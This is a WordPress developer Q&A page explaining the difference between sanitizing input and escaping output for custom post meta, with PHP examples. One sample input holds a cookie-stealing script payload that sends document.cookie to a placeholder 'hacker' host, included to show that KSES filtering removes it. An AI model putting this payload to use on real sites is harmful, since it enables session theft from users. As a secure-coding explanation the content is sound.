Should I sanitize custom post meta if it is going to be escaped later?

Short Answer: If you have properly validated the data, then sanitization can be made optional.

Longer Answer

User-supplied data and data from unknown/external sources should always be treated as untrusted even in the case where the user was actually yourself, so yes, we should always validate and/or sanitize such data. And therefore, no, please do not store user input as-is without validating or sanitizing the data.

Excerpt from “Securing (sanitizing) Input” in the plugin developer handbook:

You use sanitizing when you don’t know what to expect or you don’t
want to be strict with data
validation.

Any time you’re accepting potentially unsafe data, it is important to validate or sanitize it.

Remember: Even admins are users, and users will enter incorrect data
on purpose or on accident. It’s your job to protect them from
themselves.

And here are some examples which might help:

// let's assume $_POST['my_number_field'] is set
// same goes to $_POST['my_text_field']

// bad - no validation and no sanitization
update_post_meta( 123, 'int_meta', $_POST['my_number_field'] );

// no validation, but the value is sanitized
$value = filter_input( INPUT_POST, 'my_number_field', FILTER_SANITIZE_NUMBER_INT );
update_post_meta( 123, 'int_meta', $value );

// example with validation
if ( is_numeric( $_POST['my_number_field'] ) ) {
    update_post_meta( 123, 'int_meta', (int) $_POST['my_number_field'] );
} else {
    // show an error, delete the meta or whatever is necessary
}

// example with validation - here we specify a range of values
if ( in_array( $_POST['my_text_field'], array( 'one', 'two', '3' ) ) ) {
    update_post_meta( 123, 'text_meta', $_POST['my_text_field'] );
} else {
    // show an error, delete the meta or whatever is necessary
}

This is a little bit confusing, as wordpress sanitization functions
also encode some html characters. To my experience, this easily leads
to double encoding (especially if you can’t use wordpress-functions
like esc_html and esc_attr which do not double encode).

Maybe I’m not fully understanding that, but it seemed that you’re probably just not using the correct functions?

For example, if you’re trying to sanitize a data in which HTML tags are allowed, then you would want to use the WordPress KSES functions like wp_filter_kses() (to allow basic HTML tags) and wp_filter_post_kses() (to allow all the many HTML tags allowed in post content like p):

$value="<p>some dynamic input data with <b>html</b>, <q>a quote</q> & potentially " . // wrapped
    'unsafe code..</p> "><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>';

// This allows only basic HTML tags like strong and blockquote.
update_post_meta( 123, 'foo_meta', wp_filter_kses( $value ) );

// This allows advanced HTML tags (p, div, etc.) and attributes.
update_post_meta( 123, 'foo_meta', wp_filter_post_kses( $value ) );

Then when rendering the data, you would use escaping functions like esc_textarea(), esc_attr() and wp_kses_post():

<!-- In a form field, use esc_attr() or esc_textarea() for textarea fields -->
<input value="<?php echo esc_attr( get_post_meta( 123, 'foo_meta', true ) ); ?>">
<textarea rows="3"><?php echo esc_textarea( get_post_meta( 123, 'foo_meta', true ) ); ?></textarea>

<h2>Foo meta</h2>
<!-- Use wp_kses_post() when **not** displaying in form fields -->
<?php echo wp_kses_post( get_post_meta( 123, 'foo_meta', true ) ); ?>

Or perhaps you misunderstood the difference between sanitizing and escaping?

Because basically, sanitizing means cleaning/filtering the input, whereas escaping means we secure the output so that for example HTML tags are not parsed unless if we were allowing HTML tags in the input. (but even if HTML is allowed, you should limit the allowed tags)

And I’ve actually given an example above where I sanitized the meta value (that came from a variable named $value which is the input) and then I escaped the meta value when displaying it on the page. So in the latter case, the meta value (which was retrieved from the database) became an output when I echoed the value.

Further Reading

Related Posts:

  1. Sanitizing integer input for update_post_meta
  2. Correct processing of `$_POST`, following WordPress Coding Standards
  3. How to sanitize post meta field value?
  4. Copy content stored in meta to post content
  5. Can A Post Meta Field Store multiple values that are not in an array?
  6. esc_attr on get_post_meta [closed]
  7. Data not displaying in text field
  8. Proper Way to Sanitize Meta Input
  9. Extend file format support for post thumbnails
  10. Get posts by meta value
  11. Execute action after post is saved with all related post_meta records (data)
  12. advanced custom fields update_field for field type: Taxonomy
  13. update_post_meta not saving when value is zero
  14. Restrict post edit/delete based on user ID and custom field
  15. get_post_meta returning empty string when data shows in the database
  16. publish_post action hook doesn’t give post_meta_data
  17. Remove post meta keys
  18. How to get all term meta for a taxonomy – getting term_meta for taxonomy
  19. delete unused postmeta
  20. Front-end update_post_meta snippet displays white screen?
  21. Query between two meta values?
  22. List posts under meta_value heading
  23. loop through all meta keys with get_post_meta
  24. Get post from meta_key and meta_value
  25. How to get custom post type to display post meta on archive pages?
  26. How to use post_id with a Class?
  27. Saving html into postmeta without stripping tags – safe?
  28. How to show Published date and/or Modified date
  29. Set default Custom Post Meta Value
  30. wp_update_user isn’t instantly?
  31. Set Checkbox as checked by default
  32. How to use update_post_meta inside wp_trash_post
  33. “update_post_meta” not working in “wp_insert_post_data” hook
  34. Display All Custom Post Fields and Values, Unless Empty
  35. How to create a meta_query to get all posts with a specific meta data?
  36. Save an array of values in the post meta box
  37. hide posts with specific meta data from admin page
  38. Post MetaTable Overload
  39. get_post_meta() empty in preview WHEN custom post is published [closed]
  40. Custom RSS Feeds & Post Meta Data
  41. $wpdb class updating meta_value using Ajax [closed]
  42. get_post_meta not extracting title,permalink and posttype
  43. How to selected which tags to print, instead of printing the whole tag list?
  44. Display get_post_meta if contains value
  45. Save post meta foreach loop
  46. Should I save this mulit dementional arary as one post meta?
  47. Sort Posts By Custom Field Date?
  48. Difficultly changing date format in post meta value
  49. Remove last character in get_post_meta
  50. mass delete posts based on metadata
  51. How to obtain a group of post meta and assign each meta to other variables?
  52. “Cannot use import statement outside a module” JS error while adding a custom meta block?
  53. Duplicate rows in meta table, any known relations in WC?
  54. Adding Custom MetaData
  55. Suggestion to make posts have multiple associated items
  56. How to properly use oneOf and anyOf in Rest Schema?
  57. update_post_meta in loop changing ALL values
  58. Get the author meta adds now
  59. Why is my get_post_meta not properly calling the custom field when attempting to embed a YouTube video?
  60. show ad after # paragraphs
  61. If ACF meta_key has meta_value
  62. How to echo value of a meta select box to the browser
  63. How can I use ‘orderby’ => ‘meta_value_num’ to order by the numerical value even if the value starts with a word?
  64. New Table vs Post / Comment Meta
  65. Repeated nav bar queries failing to be cached
  66. Randomizing Post Links Outside of Loop – No Author or Date
  67. How do I add a fixed value to get_post_meta();?
  68. Add post’s category as a meta tag to the post
  69. Insert Custom Field Value
  70. How can I query for posts using a date stored in post-meta?
  71. SQL query – get a featured image’s alt / alternative text
  72. get specific values from WordPress meta_value
  73. Is duplicate `_wp_attachment_image_alt` meta key allowed?
  74. How do I list taxonomies that have upcoming events in WP? Is there a way to do this without having to query posts first?
  75. How can i set media attachments to the author of the post or page for already existed posts with attachments
  76. How to get posts by meta value as multi-dimensional array?
  77. Add post meta data date to event
  78. How to modify default meta link format
  79. Something adding an excessive meta description
  80. Get table parameter and save in meta value
  81. How can i show post views using specified post ID?
  82. How to add/update post meta to use in query?
  83. how to query posts using value in meta post array
  84. Why doesn’t wp_oembed_get() for the video post format not work?
  85. Custom Meta Fields that are Echo’d are removed on post update?
  86. How to add dynamic content in title and meta description in wordpress theme for homepage, post page, category, tag and pages
  87. How to call get_post()?
  88. Exclude category from DB query
  89. add_post_meta only adding 1 character
  90. How to sort by meta value num, but ignore zero value?
  91. Posts with no meta field do not appear when sorting by meta field
  92. How do I delete element from a serialized array upon deletion of a post?
  93. Which query method to use? (edit- wpdb syntax problems)
  94. Get meta information from post parent
  95. How to update post meta with xml data
  96. Counting number of identical meta keys
  97. query with custom field
  98. Using Form to alter PHP variable [closed]
  99. Chance post id into post name
  100. get_post_meta() returns nothing in save_post, publish_post, wp_after_insert_post

Leave a Comment

techhipbettruvabetnorabahisbahis forumutaraftarium24edueduseduseduseduseduseduseduseduedus